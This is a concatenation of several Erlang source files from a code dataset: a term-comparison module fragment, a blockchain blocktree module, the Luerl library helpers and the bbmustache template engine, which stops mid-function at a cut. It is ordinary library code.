true -> gt(RA, RB);
false -> gt(A, B)
end;
%% "Nil" > "Cons"
gt([], [_A | _B]) -> true;
gt([_A | _B], []) -> false;
gt(A,B)->
A>B.
lt({N,D},I) when is_integer(N),is_integer(D),is_integer(I) ->
rationals:is_lesser({N,D},{I,1});
lt(I,{N,D}) when is_integer(N),is_integer(D),is_integer(I) ->
rationals:is_lesser({I,1},{N,D});
lt({N,D},{N1,D1}) when is_integer(N),is_integer(D),is_integer(N1),is_integer(D1)->
rationals:is_lesser({N,D},{N1,D1});
lt({A},{B}) when is_tuple(A),is_tuple(B)->
lt(A,B);
lt({}, {}) -> false;
lt(A,B) when is_tuple(A),is_tuple(B)->
lt(tuple_to_list(A), tuple_to_list(B));
lt(A,T) when is_atom(A),is_tuple(T)->
A<element(1,T);
lt(T,A) when is_atom(A),is_tuple(T)->
element(1,T)<A;
lt([A | RA], [B | RB]) ->
case eq(A, B) of
true -> lt(RA, RB);
false -> lt(A, B)
end;
%% "Cons" < "Nil"
lt([], [_A | _B]) -> false;
lt([_A | _B], []) -> true;
%% no need to handle null < pid separately; atom < tuple < pid in Erlang
lt(A,B)->
A<B.
le(A,B) ->
eq(A,B) orelse lt(A,B).
ge(A,B) ->
eq(A,B) orelse gt(A,B). | frontend/src/main/resources/erlang/absmodel/src/cmp.erl | 0.50415 | 0.76388 | cmp.erl | starcoder |
%% @doc Blocktree
%%
%% Potential optimization: searches for previous nonce by player can
%% be made faster by caching previous searches. Would speed up
%% add_block_in_order and generate_new_block
-module(blocktree).
-export([
new/0,
add_new_transaction/2,
add_block_in_order/2,
generate_new_block/2,
get_block_by_id/2,
get_status_info/1
%% get_all_longest_branches/1,
%% get_children_block_list/2
]).
-include_lib("stdlib/include/assert.hrl").
-include("potato_records.hrl").
-type tx() :: map().
%% -type txarray() :: array:array(tx()).
-type txlist() :: [tx()].
-type playertxmap() :: map().
-type addresult() :: ignored_duplicate | updated_old | added_new.
%% -type addresult() :: any().
-type treedata() :: #tree_data{}.
-type playerid() :: integer().
-type nonce() :: integer().
-type blockid() :: integer() | undefined.
-type blockmap() :: map().
-type block() :: map().
%% @doc Initializes an empty container
-spec new() -> treedata().
new() ->
#tree_data{
pending_transactions = pending_transactions:new(),
block_map = maps:new()
}.
%% @doc Adds a new transaction to transaction list.
%%
%% Called when we get a new transaction from a player.
%% Can do it out of order.
%% Duplicate transactions are ignored, but we can rewrite a transaction
%% with a given nonce by a different transaction with the same nonce.
%% Returns {Status, Container} where Status is
%% ignored_duplicate, updated_old, added_new
-spec add_new_transaction(tx(), treedata()) -> {addresult(), treedata()}.
add_new_transaction(Transaction, TreeData)
when is_map(Transaction),
is_record(TreeData, tree_data) ->
{PendingTxNew, Status} = pending_transactions:add_transaction(Transaction, TreeData#tree_data.pending_transactions),
{Status, TreeData#tree_data{pending_transactions = PendingTxNew}}.
-spec transaction_list_check_if_in_order(playerid(), txlist()) -> ok.
transaction_list_check_if_in_order(_, List) ->
NonceList = lists:map(fun (T) -> maps:get(nonce, T) end, List),
[FirstNonce | _] = NonceList,
Sz = length(List),
ProperNonceList = lists:seq(FirstNonce, FirstNonce + Sz - 1),
?assertEqual(NonceList, ProperNonceList, "bad nonce order").
-spec get_first_nonce_in_transaction_list(playerid(), txlist()) -> nonce().
get_first_nonce_in_transaction_list(_, TransactionList) ->
[FirstTransaction | _ ] = TransactionList,
maps:get(nonce, FirstTransaction).
-spec get_last_nonce_in_transaction_list(txlist()) -> nonce().
get_last_nonce_in_transaction_list(TransactionList) ->
[FirstTransaction | _ ] = TransactionList,
FirstNonce = maps:get(nonce, FirstTransaction),
Sz = length(TransactionList),
FirstNonce + Sz - 1.
-spec search_previous_transaction_nonce_for_player(playerid(), blockmap(), blockid()) -> nonce().
search_previous_transaction_nonce_for_player(_, _, BlockId) when BlockId == undefined ->
-1;
search_previous_transaction_nonce_for_player(PlayerId, BlockMap, BlockId) ->
{ok, Block} = maps:find(BlockId, BlockMap),
#{previous_id := PrevBlockId, transactions := BlockTransactionsList} = Block,
BlockTransactionsMap = transaction_map_from_list(BlockTransactionsList),
case maps:find(PlayerId, BlockTransactionsMap) of
{ok, TransactionList} ->
get_last_nonce_in_transaction_list(TransactionList);
error ->
search_previous_transaction_nonce_for_player(PlayerId, BlockMap, PrevBlockId)
end.
-spec transaction_map_from_list(txlist()) -> playertxmap().
transaction_map_from_list(ListR) ->
List = lists:reverse(ListR),
lists:foldl(fun transaction_map_from_list/2, maps:new(), List).
transaction_map_from_list(T, Map) ->
Id = maps:get(player_id, T),
case maps:find(Id, Map) of
{ok, OldList} ->
NewList = [T | OldList];
error ->
NewList = [T]
end,
maps:put(Id, NewList, Map).
%% @doc Adds a new block to the blocktree.
%%
%% If successful, it returns updated TreeData.
%%
%% Fails if:
%%
%% <ul>
%% <li> can't find previous block</li>
%% <li> this_id is not unique </li>
%% <li> height is incorrect</li>
%% <li> transactions list is incorrect:
%% <ul>
%% <li> Nonces in each list should be in order</li>
%% <li> First nonce in a list should come after the last nonce in the chain for that player</li>
%% </ul>
%% </li>
%% </ul>
%%
%% Note: genesis block will have previous_id=undefined and height=0
-spec add_block_in_order(block(), treedata()) -> treedata().
add_block_in_order(Block, TreeData)
when is_map(Block),
is_record(TreeData, tree_data) ->
#tree_data{block_map = BlockMap} = TreeData,
#{previous_id := PrevId, this_id := ThisId, height := Height, transactions := BlockTransactionsList} = Block,
?assertEqual(error, maps:find(ThisId, BlockMap), "this_id already exists"),
BlockTransactionsMap = transaction_map_from_list(BlockTransactionsList),
maps:map(fun transaction_list_check_if_in_order/2, BlockTransactionsMap),
%% check_that_player_ids_are_correct(BlockTransactionsMap),
FirstNonceMap = maps:map(fun get_first_nonce_in_transaction_list/2, BlockTransactionsMap),
MapEmpty = maps:size(BlockMap) == 0,
if
MapEmpty ->
?assertEqual(Height, 0, "genesis, bad height"),
?assertEqual(PrevId, undefined, "genesis, bad previous_id"),
ZeroNonceMap = maps:map(fun(_, _) -> 0 end, BlockTransactionsMap),
?assertEqual(FirstNonceMap, ZeroNonceMap, "genesis, transactions not starting with zero");
not MapEmpty ->
Result = maps:find(PrevId, BlockMap),
?assertMatch({ok, _}, Result, "cannot find previous_id"),
{ok, PrevBlock} = Result,
?assertEqual(Height, maps:get(height, PrevBlock) + 1, "bad height"),
MapFn = fun(PlayerId, _) -> 1 + search_previous_transaction_nonce_for_player(PlayerId, BlockMap, PrevId) end,
FirstNonceMapProper = maps:map(MapFn, BlockTransactionsMap),
?assertEqual(FirstNonceMap, FirstNonceMapProper, "transactions not starting with correct nonce")
end,
NewBlockMap = maps:put(ThisId, Block, BlockMap),
TreeData#tree_data{block_map = NewBlockMap}.
%% @doc Generates new block after block with PreviousBlockId.
%%
%% Puts the appropriate pending transactions inside.
-spec generate_new_block(blockid(), treedata()) -> map().
generate_new_block(PreviousBlockId, TreeData)
when is_record(TreeData, tree_data) ->
#tree_data{
block_map = BlockMap,
pending_transactions = PendingTx
} = TreeData,
if
PreviousBlockId == undefined ->
Height = 0;
PreviousBlockId /= undefined ->
Result = maps:find(PreviousBlockId, BlockMap),
?assertMatch({ok, _}, Result, "cannot find previous_id"),
{ok, PrevBlock} = Result,
Height = 1 + maps:get(height, PrevBlock)
end,
PendingPlayers = pending_transactions:get_pending_players(PendingTx),
MapFn = fun(PlayerId) ->
NextNonce = 1 + search_previous_transaction_nonce_for_player(PlayerId, BlockMap, PreviousBlockId),
{PlayerId, NextNonce}
end,
FirstNonceMap = maps:from_list(lists:map(MapFn, PendingPlayers)),
BlockTransactions = pending_transactions:get_pending_transactions(FirstNonceMap, PendingTx),
#{
previous_id => PreviousBlockId,
this_id => undefined,
height => Height,
transactions => BlockTransactions,
consensus_data => undefined
}.
-spec get_block_by_id(blockid(), treedata()) -> block().
get_block_by_id(Id, TreeData)
when is_record(TreeData, tree_data) ->
#tree_data{block_map = BlockMap} = TreeData,
Result = maps:find(Id, BlockMap),
?assertMatch({ok, _}, Result, "cannot find block by id"),
{ok, Block} = Result,
Block.
%% -spec get_all_longest_branches(treedata()) -> [block()].
%% get_all_longest_branches(TreeData)
%% when is_record(TreeData, tree_data) ->
%% #tree_data{block_map = BlockMap} = TreeData,
%% MaxHtFn = fun(_, V, Max) -> max(maps:get(height, V), Max) end,
%% MaxHt = maps:fold(MaxHtFn, 0, BlockMap),
%% MaxHtList = maps:values(maps:filter(fun(_, V) -> maps:get(height, V) == MaxHt end, BlockMap)),
%% MaxHtList.
%% -spec get_children_block_list(blockid(), treedata()) -> [block()].
%% get_children_block_list(PrevId, TreeData)
%% when is_record(TreeData, tree_data) ->
%% #tree_data{block_map = BlockMap} = TreeData,
%% maps:values(maps:filter(fun(_, B) -> maps:get(previous_id, B) == PrevId end, BlockMap)).
get_status_info(_TreeData = #tree_data{pending_transactions = Tx, block_map = Mp}) ->
pending_transactions:get_status_info(Tx) ++
[
{"blocks in tree", maps:size(Mp)}
]. | src/blocktree.erl | 0.526343 | 0.427516 | blocktree.erl | starcoder |
%% Copyright (c) 2013-2018 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% File : luerl_lib.erl
%% Author : <NAME>
%% Purpose : Luerl libraries.
%% A collection of useful functions. Those with '_' in their names
%% generate Erlang data types while those with generate Lua data types
%% (floats and binaries).
-module(luerl_lib).
-include("luerl.hrl").
-export([lua_error/2,badarg_error/3,format_error/1]).
-export([boolean_value/1,first_value/1]).
-export([number_to_list/1,to_list/1,to_lists/1,to_lists/2,
to_int/1,to_ints/1,to_ints/2]).
-export([tonumber/1,tonumber/2,tonumbers/1,tonumbers/2,tointeger/1,
tointegers/1,tointegers/2,tostring/1,tostrings/1,tostrings/2,
conv_list/2,conv_list/3]).
-spec lua_error(_,_) -> no_return().
-spec badarg_error(_,_,_) -> no_return().
lua_error(E, St) -> error({lua_error,E,St}).
badarg_error(What, Args, St) -> lua_error({badarg,What,Args}, St).
%% format_error(LuaError) -> ErrorString.
%% Some of these use same text as Lua error string, so be careful if
%% modifying them.
format_error({undefined_method, Name, Args0, Line}) ->
io_lib:format("undefined_method ~w with args: ~p on line ~p",
[Name, Args0, Line]);
format_error({badarg,Where,As}) ->
io_lib:format("badarg in ~w: ~w", [Where,As]);
format_error({method_on_nil, Key}) ->
io_lib:format("undefined method ~w on nil", [Key]);
format_error({illegal_key,Tab,Key}) ->
io_lib:format("invalid key in ~w: ~w", [Tab,Key]);
format_error({illegal_index,Where,I}) ->
io_lib:format("invalid index in ~w: ~w", [Where,I]);
format_error({illegal_val,Where,Val}) ->
io_lib:format("invalid value in ~w: ~w", [Where,Val]);
format_error({illegal_val,Val}) ->
io_lib:format("invalid value: ~w", [Val]);
format_error({illegal_comp,Where}) ->
io_lib:format("illegal comparison in ~w", [Where]);
format_error({invalid_order,Where}) -> %Keep text!
io_lib:format("invalid order function in ~w", [Where]);
format_error({undef_function,Name}) ->
io_lib:format("undefined function ~w", [Name]);
format_error({undef_method,Obj,Name}) ->
io_lib:format("undefined method in ~w: ~w", [Obj,Name]);
%% Pattern errors.
format_error(invalid_pattern) -> %Keep text!
io_lib:format("malformed pattern", []);
format_error(invalid_capture) -> %Keep text!
io_lib:format("malformed pattern", []);
format_error({invalid_char_class,C}) -> %Keep text!
io_lib:format("malformed pattern (class ~c)", [C]);
format_error(invalid_char_set) -> %Keep text!
io_lib:format("malformed pattern (missing ']')", []);
%% Illegal or undefined ops.
format_error({illegal_op,Op}) ->
io_lib:format("illegal op: ~w", [Op]);
format_error({undefined_op,Op}) ->
io_lib:format("undefined op: ~w", [Op]);
format_error({no_module,Mod}) ->
io_lib:format("module '~s' not found", [Mod]).
%% boolean_value(Rets) -> boolean().
%% first_value(Rets) -> Value | nil.
boolean_value([nil|_]) -> false;
boolean_value([false|_]) -> false;
boolean_value([_|_]) -> true;
boolean_value([]) -> false.
first_value([V|_]) -> V;
first_value([]) -> nil.
to_list(N) when is_number(N) -> number_to_list(N);
to_list(B) when is_binary(B) -> binary_to_list(B);
to_list(_) -> nil.
to_lists(As) -> to_lists(As, []).
to_lists(As, Acc) ->
to_loop(As, fun to_list/1, Acc).
to_int(N) when is_number(N) -> round(N);
to_int(B) when is_binary(B) ->
case bin_to_float(B) of
{ok,N} -> round(N);
error -> nil
end;
to_int(_) -> nil.
to_ints(As) -> to_ints(As, []).
to_ints(As, Acc) ->
to_loop(As, fun to_int/1, Acc).
%% bin_to_float(Binary) -> {ok,Number} | error.
%% str_to_float(String) -> {ok,Number} | error.
%% Use the scanner to process all allowed number syntaxes.
bin_to_float(B) -> str_to_float(binary_to_list(B)).
str_to_float(S) ->
case luerl_scan:string(S) of
{ok,[{'NUMBER',_,N}],_} -> {ok,N};
{ok,[{'+',_},{'NUMBER',_,N}],_} -> {ok,N};
{ok,[{'-',_},{'NUMBER',_,N}],_} -> {ok,-N};
_ -> error
end.
number_to_list(N) ->
I = round(N),
case I == N of %Is it an "integer"?
true -> integer_to_list(I);
false -> io_lib:write(N)
end.
%% tonumber(Arg) -> Number | nil.
%% tonumber(Arg, Base) -> Number | nil.
%% Tonumber/2 only generates "integers". Lua does it like that.
tonumber(N) when is_number(N) -> N;
tonumber(B) when is_binary(B) ->
case bin_to_float(B) of
{ok,N} -> N;
error -> nil
end;
tonumber(_) -> nil.
tonumber(A, B) ->
case conv_list([A,B], [list,integer]) of
[N0,Base] ->
case catch begin [N1] = string:tokens(N0, [9,10,11,12,13,32,160]),
{ok,list_to_integer(N1, Base)} end of
{ok,I} -> float(I);
_ -> nil
end
end.
%% tonumber(A, B) ->
%% case tonumbers([A,B]) of
%% [N1,N2] when ?IS_INTEGER(N1) ->
%% N1 * math:pow(10,N2);
%% nil -> nil
%% end.
tointeger(A) ->
case tonumber(A) of
nil -> nil;
N -> float(round(N))
end.
tonumbers(As) -> tonumbers(As, []).
tonumbers(As, Acc) ->
to_loop(As, fun tonumber/1, Acc).
tointegers(As) -> tointegers(As, []).
tointegers(As, Acc) ->
to_loop(As, fun tointeger/1, Acc).
tostring(N) when is_number(N) -> list_to_binary(number_to_list(N));
tostring(B) when is_binary(B) -> B;
tostring(_) -> nil.
tostrings(As) -> tostrings(As, []).
tostrings(As, Acc) ->
to_loop(As, fun tostring/1, Acc).
%% to_loop(List, Convert, Acc) -> List | nil.
to_loop(As, Fun, Acc) ->
lists:foldr(fun (_, nil) -> nil; %Propagate nil
(A, Ns) ->
case Fun(A) of
nil -> nil; %Propagate nil
N -> [N|Ns]
end
end, Acc, As).
%% conv_list(Args, ToTypes) -> List | nil.
%% conv_list(Args, ToTypes, Done) -> List | nil.
%% Basically a type driven foldr where we return a list or nil.
conv_list(As, Tos) -> conv_list(As, Tos, []).
conv_list(_, _, nil) -> nil; %Propagate nil
conv_list([A|As], [To|Tos], Rs0) ->
case conv_list(As, Tos, Rs0) of
nil -> nil; %Propagate nil
Rs1 ->
%% Get the right value.
Ret = case To of
%% Erlang types.
list -> to_list(A);
integer -> to_int(A);
string -> to_list(A);
%% Lua types.
lua_any -> A;
lua_integer -> tointeger(A);
lua_number -> tonumber(A);
lua_string -> tostring(A);
lua_bool -> ?IS_TRUE(A)
end,
case Ret of
nil -> nil; %Propagate nil
Ret -> [Ret|Rs1]
end
end;
conv_list([], _, Acc) -> Acc; %No more arguments, done
conv_list(_, [], Acc) -> Acc. %No more conversions, done | src/luerl_lib.erl | 0.50708 | 0.42483 | luerl_lib.erl | starcoder |
%% @copyright 2015 <NAME> All Rights Reserved.
%%
%% @doc Binary pattern match based Mustache template engine for Erlang/OTP.
%%
%% Please refer to [the man page](http://mustache.github.io/mustache.5.html) and [the spec](https://github.com/mustache/spec) of mustache as the need arises.<br />
%%
%% Please see [this](../benchmarks/README.md) for a list of features that bbmustache supports.
%%
-module(bbmustache).
%%----------------------------------------------------------------------------------------------------------------------
%% Exported API
%%----------------------------------------------------------------------------------------------------------------------
-export([
render/2,
render/3,
parse_binary/1,
parse_binary/2,
parse_file/1,
parse_file/2,
compile/2,
compile/3,
default_value_serializer/1
]).
-export_type([
template/0,
data/0,
recursive_data/0,
option/0, % deprecated
compile_option/0,
parse_option/0,
render_option/0
]).
%%----------------------------------------------------------------------------------------------------------------------
%% Defines & Records & Types
%%----------------------------------------------------------------------------------------------------------------------
-define(PARSE_ERROR, incorrect_format).
-define(FILE_ERROR, file_not_found).
-define(CONTEXT_MISSING_ERROR(Msg), {context_missing, Msg}).
-define(IIF(Cond, TValue, FValue),
case Cond of true -> TValue; false -> FValue end).
-define(ADD(X, Y), ?IIF(X =:= <<>>, Y, [X | Y])).
-define(START_TAG, <<"{{">>).
-define(STOP_TAG, <<"}}">>).
-define(RAISE_ON_CONTEXT_MISS_ENABLED(Options),
proplists:get_bool(raise_on_context_miss, Options)).
-define(RAISE_ON_PARTIAL_MISS_ENABLED(Options),
proplists:get_bool(raise_on_partial_miss, Options)).
-define(PARSE_OPTIONS, [raise_on_partial_miss]).
-type key() :: binary().
%% Key MUST be a non-whitespace character sequence NOT containing the current closing delimiter. <br />
%%
%% In addition, `.' has a special meaning. <br />
%% (1) `parent.child' ... looks up `child' inside `parent'. <br />
%% (2) `.' ... refers to the current context itself. However, this only works when the corresponding value has type `[integer() | float() | binary() | string() | atom()]'. Otherwise, the behavior is undefined.
%%
-type source() :: binary().
%% If you use lambda expressions, the original source text is necessary.
%%
%% ```
%% e.g.
%%  template:
%%    {{#lambda}}a{{b}}c{{/lambda}}
%%  parse result:
%%    {'#', <<"lambda">>, [<<"a">>, {'n', <<"b">>}, <<"c">>], <<"a{{b}}c">>}
%% '''
%%
%% NOTE:
%% Since a binary reference is used internally, keeping the source is not
%% especially wasteful of memory. However, the more tags that are used,
%% the more memory these references retain.
-type tag() :: {n, [key()]}
| {'&', [key()]}
| {'#', [key()], [tag()], source()}
| {'^', [key()], [tag()]}
| {'>', key(), Indent :: source()}
| binary(). % plain text
-record(?MODULE,
{
data :: [tag()],
partials = [] :: [{key(), [tag()]} | key()],
%% The `{key(), [tag()]}` indicates that `key()` already parsed and `[tag()]` is the result of parsing.
%% The `key()` indicates that the file did not exist.
options = [] :: [compile_option()],
indents = [] :: [binary()],
context_stack = [] :: [data()]
}).
-opaque template() :: #?MODULE{}.
%% @see parse_binary/1
%% @see parse_file/1
-record(state,
{
dirname = <<>> :: file:filename_all(),
start = ?START_TAG :: binary(),
stop = ?STOP_TAG :: binary(),
partials = [] :: [key()],
standalone = true :: boolean()
}).
-type state() :: #state{}.
-type parse_option() :: raise_on_partial_miss.
%% - raise_on_partial_miss: If the template used in partials does not found, it will throw an exception (error).
-type compile_option() :: {key_type, atom | binary | string}
| raise_on_context_miss
| {escape_fun, fun((binary()) -> binary())}
| {value_serializer, fun((any()) -> iodata())}.
%% - key_type: Specify the type of the key in {@link data/0}. Default value is `string'.
%% - raise_on_context_miss: If key exists in template does not exist in data, it will throw an exception (error).
%% - escape_fun: Specify your own escape function.
%% - value_serializer: specify how terms are converted to iodata when templating.
-type render_option() :: compile_option() | parse_option().
%% @see compile_option/0
%% @see parse_option/0
-type option() :: compile_option().
%% This type has been deprecated since 1.6.0. It will remove in 2.0.0.
%% @see compile_option/0
-type data() :: term().
%% Beginners should consider {@link data/0} as {@link recursive_data/0}.
%% By specifying options, the type are greatly relaxed and equal to `term/0'.
%%
%% @see render/2
%% @see compile/2
-type data_key() :: atom() | binary() | string().
%% You can choose one from these as the type of key in {@link recursive_data/0}.
%% The default is `string/0'.
%% If you want to change this, you need to specify `key_type' in {@link compile_option/0}.
-ifdef(namespaced_types).
-type recursive_data() :: #{data_key() => term()} | [{data_key(), term()}].
-else.
-type recursive_data() :: [{data_key(), term()}].
-endif.
%% It is a part of {@link data/0} that can have child elements.
-type endtag() :: {endtag, {state(), [key()], LastTagSize :: non_neg_integer(), Rest :: binary(), Result :: [tag()]}}.
%%----------------------------------------------------------------------------------------------------------------------
%% Exported Functions
%%----------------------------------------------------------------------------------------------------------------------
%% @doc Render the mustache template `Bin' with `Data', using default options.
%% @equiv render(Bin, Data, [])
-spec render(binary(), data()) -> binary().
render(Bin, Data) ->
    render(Bin, Data, []).
%% @doc Render the mustache template `Bin' with `Data' and `Options'.
%%
%% Options are split into the subset consumed while parsing and the subset
%% consumed while compiling; each phase receives only its own options.
%% @equiv compile(parse_binary(Bin), Data, Options)
-spec render(binary(), data(), [render_option()]) -> binary().
render(Bin, Data, Options) ->
    IsParseOption = fun(Option) -> lists:member(Option, ?PARSE_OPTIONS) end,
    {ParseOptions, CompileOptions} = lists:partition(IsParseOption, Options),
    Template = parse_binary(Bin, ParseOptions),
    compile(Template, Data, CompileOptions).
%% @doc Create a {@link template/0} from a binary, using default options.
%% @equiv parse_binary(Bin, [])
-spec parse_binary(binary()) -> template().
parse_binary(Bin) when is_binary(Bin) ->
    parse_binary(Bin, []).
%% @doc Create a {@link template/0} from a binary.
%%
%% The binary is parsed into a tag list, and any partials referenced by it
%% are then resolved from disk (relative to the current directory).
-spec parse_binary(binary(), [parse_option()]) -> template().
parse_binary(Bin, Options) ->
    {State, Tags} = parse(#state{}, Bin),
    Template = #?MODULE{data = Tags},
    parse_remaining_partials(State, Template, Options).
%% @doc Create a {@link template/0} from a file, using default options.
%% @equiv parse_file(Filename, [])
-spec parse_file(file:filename_all()) -> template().
parse_file(Filename) ->
    parse_file(Filename, []).
%% @doc Create a {@link template/0} from a file.
%%
%% When the file carries a `.mustache' extension, its parsed tags are also
%% stored in the template's partials under the file's base name. Raises
%% `error(file_not_found)' when the file cannot be read.
-spec parse_file(file:filename_all(), [parse_option()]) -> template().
parse_file(Filename, Options) ->
    State0 = #state{dirname = filename:dirname(Filename)},
    case file:read_file(Filename) of
        {ok, Source} ->
            {State1, Tags} = parse(State0, Source),
            Ext = to_binary(filename:extension(Filename)),
            Template =
                case Ext of
                    <<".mustache">> ->
                        Basename = filename:basename(Filename, Ext),
                        #?MODULE{partials = [{Basename, Tags}], data = Tags};
                    _ ->
                        #?MODULE{data = Tags}
                end,
            parse_remaining_partials(State1, Template, Options);
        _ ->
            error(?FILE_ERROR, [Filename, Options])
    end.
%% @doc Embed `Data' in `Template' using default compile options.
%% @equiv compile(Template, Data, [])
-spec compile(template(), data()) -> binary().
compile(Template, Data) ->
    compile(Template, Data, []).
%% @doc Embed the data in the template.
%%
%% ```
%% 1> Template = bbmustache:parse_binary(<<"{{name}}">>).
%% 2> bbmustache:compile(Template, #{"name" => "Alice"}).
%% <<"Alice">>
%% '''
%% `Data' may be an associative list or a map. <br />
%% All keys MUST share the same type.
-spec compile(template(), data(), [compile_option()]) -> binary().
compile(#?MODULE{data = Tags} = Template, Data, Options) ->
    %% The compile state reuses the template record, carrying the caller's
    %% options; `data' is cleared because the tags are passed separately.
    State = Template#?MODULE{options = Options, data = []},
    Reversed = compile_impl(Tags, Data, [], State),
    iolist_to_binary(lists:reverse(Reversed)).
%% @doc Default value serializer for templated values.
%%
%% Integers, floats and atoms are converted to textual iodata; binaries and
%% strings (lists) pass through unchanged via the final clause. Maps and
%% tuples are rejected with `error(unsupported_term)'.
-spec default_value_serializer(number() | binary() | string() | atom()) -> iodata().
default_value_serializer(V) when is_integer(V) ->
    integer_to_binary(V);
default_value_serializer(V) when is_float(V) ->
    %% NOTE: Produces the same text as io_lib:format("~p", [V]) for floats,
    %% but faster. See:
    %% http://www.cs.indiana.edu/~dyb/pubs/FP-Printing-PLDI96.pdf
    io_lib_format:fwrite_g(V);
default_value_serializer(V) when is_atom(V) ->
    list_to_binary(atom_to_list(V));
default_value_serializer(V) when is_map(V); is_tuple(V) ->
    error(unsupported_term, [V]);
default_value_serializer(V) ->
    V.
%%----------------------------------------------------------------------------------------------------------------------
%% Internal Function
%%----------------------------------------------------------------------------------------------------------------------
%% @doc {@link compile/2}
%%
%% ATTENTION: The result is a list that is inverted.
%%
%% Recursively renders the parsed tag list, pushing each rendered piece onto
%% the `Result' accumulator (hence the reversed order); the caller reverses
%% and flattens the final iolist.
-spec compile_impl(Template :: [tag()], data(), Result :: iodata(), template()) -> iodata().
%% No more tags: return the accumulated (reversed) output.
compile_impl([], _, Result, _) ->
    Result;
%% {{key}} : escaped interpolation. The value is looked up, serialized, and
%% passed through the escape function (`escape_fun' option, defaulting to
%% this module's `escape/1').
compile_impl([{n, Keys} | T], Data, Result, State) ->
    ValueSerializer = proplists:get_value(value_serializer, State#?MODULE.options, fun default_value_serializer/1),
    Value = iolist_to_binary(ValueSerializer(get_data_recursive(Keys, Data, <<>>, State))),
    EscapeFun = proplists:get_value(escape_fun, State#?MODULE.options, fun escape/1),
    compile_impl(T, Data, ?ADD(EscapeFun(Value), Result), State);
%% {{& key}} : unescaped interpolation - serialized but not escaped.
compile_impl([{'&', Keys} | T], Data, Result, State) ->
    ValueSerializer = proplists:get_value(value_serializer, State#?MODULE.options, fun default_value_serializer/1),
    compile_impl(T, Data, ?ADD(ValueSerializer(get_data_recursive(Keys, Data, <<>>, State)), Result), State);
%% {{#key}}...{{/key}} : section. The current data is pushed onto the context
%% stack, then the body is rendered according to the looked-up value's shape
%% (see the case clauses below).
compile_impl([{'#', Keys, Tags, Source} | T], Data, Result, State) ->
    Value = get_data_recursive(Keys, Data, false, State),
    NestedState = State#?MODULE{context_stack = [Data | State#?MODULE.context_stack]},
    case is_recursive_data(Value) of
        true ->
            %% Nested data structure: render the body once with it as context.
            compile_impl(T, Data, compile_impl(Tags, Value, Result, NestedState), State);
        _ when is_list(Value) ->
            %% List: render the body once per element.
            compile_impl(T, Data, lists:foldl(fun(X, Acc) -> compile_impl(Tags, X, Acc, NestedState) end,
                                              Result, Value), State);
        _ when Value =:= false ->
            %% Falsy: skip the section entirely.
            compile_impl(T, Data, Result, State);
        _ when is_function(Value, 2) ->
            %% Lambda: invoked with the raw section source and a render fun.
            Ret = Value(Source, fun(Text) -> render(Text, Data, State#?MODULE.options) end),
            compile_impl(T, Data, ?ADD(Ret, Result), State);
        _ ->
            %% Any other truthy value: render the body against the current data.
            compile_impl(T, Data, compile_impl(Tags, Data, Result, State), State)
    end;
%% {{^key}}...{{/key}} : inverted section - rendered only when the value is
%% missing, `false', or the empty list.
compile_impl([{'^', Keys, Tags} | T], Data, Result, State) ->
    Value = get_data_recursive(Keys, Data, false, State),
    case Value =:= [] orelse Value =:= false of
        true  -> compile_impl(T, Data, compile_impl(Tags, Data, Result, State), State);
        false -> compile_impl(T, Data, Result, State)
    end;
%% {{> key}} : partial. Renders the named pre-parsed partial with its
%% indentation appended to the indent stack; a missing partial raises only
%% when the `raise_on_context_miss' option is set.
compile_impl([{'>', Key, Indent} | T], Data, Result0, #?MODULE{partials = Partials} = State) ->
    case proplists:get_value(Key, Partials) of
        undefined ->
            case ?RAISE_ON_CONTEXT_MISS_ENABLED(State#?MODULE.options) of
                true  -> error(?CONTEXT_MISSING_ERROR({?FILE_ERROR, Key}));
                false -> compile_impl(T, Data, Result0, State)
            end;
        PartialT ->
            Indents = State#?MODULE.indents ++ [Indent],
            Result1 = compile_impl(PartialT, Data, [Indent | Result0], State#?MODULE{indents = Indents}),
            compile_impl(T, Data, Result1, State)
    end;
%% Plain text while inside a partial (indents =/= []): when the chunk ends
%% with a newline, the accumulated indents are emitted after it so the next
%% line of the partial is indented correctly.
compile_impl([B1 | [_|_] = T], Data, Result, #?MODULE{indents = Indents} = State) when Indents =/= [] ->
    case byte_size(B1) > 0 andalso binary:last(B1) of
        $\n -> compile_impl(T, Data, [Indents, B1 | Result], State);
        _   -> compile_impl(T, Data, [B1 | Result], State)
    end;
%% Plain text: copied through to the accumulator unchanged.
compile_impl([Bin | T], Data, Result, State) ->
    compile_impl(T, Data, [Bin | Result], State).
%% @doc Parse remaining partials in State. It returns {@link template/0}.
-spec parse_remaining_partials(state(), template(), [parse_option()]) -> template().
%% Each queued partial key is resolved once: keys already present in the
%% template's partials are skipped, the rest are read from "<Key>.mustache"
%% (joined with the state's dirname when one is set).
parse_remaining_partials(#state{partials = []}, Template = #?MODULE{}, _Options) ->
    Template;
parse_remaining_partials(State = #state{partials = [P | PartialKeys]}, Template = #?MODULE{partials = Partials}, Options) ->
    case proplists:is_defined(P, Partials) of
        true -> parse_remaining_partials(State#state{partials = PartialKeys}, Template, Options);
        false ->
            Filename0 = <<P/binary, ".mustache">>,
            Dirname = State#state.dirname,
            Filename = ?IIF(Dirname =:= <<>>, Filename0, filename:join([Dirname, Filename0])),
            case file:read_file(Filename) of
                {ok, Input} ->
                    %% Parsing a partial may discover further partials; they
                    %% are queued in State1 and handled by the recursion.
                    {State1, Data} = parse(State, Input),
                    parse_remaining_partials(State1, Template#?MODULE{partials = [{P, Data} | Partials]}, Options);
                {error, Reason} ->
                    case ?RAISE_ON_PARTIAL_MISS_ENABLED(Options) of
                        true -> error({?FILE_ERROR, P, Reason});
                        %% Tolerated miss: the bare key is kept as a marker so
                        %% this key is not retried; a bare (non-tuple) entry is
                        %% invisible to proplists:get_value/2 at render time,
                        %% so the partial renders as missing.
                        false -> parse_remaining_partials(State#state{partials = PartialKeys},
                                                          Template#?MODULE{partials = [P | Partials]}, Options)
                    end
            end
    end.
%% @doc Analyze the syntax of the mustache.
-spec parse(state(), binary()) -> {#state{}, [tag()]}.
parse(State0, Bin) ->
    case parse1(State0, Bin, []) of
        {endtag, {_, Keys, _, _, _}} ->
            %% An `endtag' surfacing at the top level means an unmatched
            %% `{{/...}}' section close.
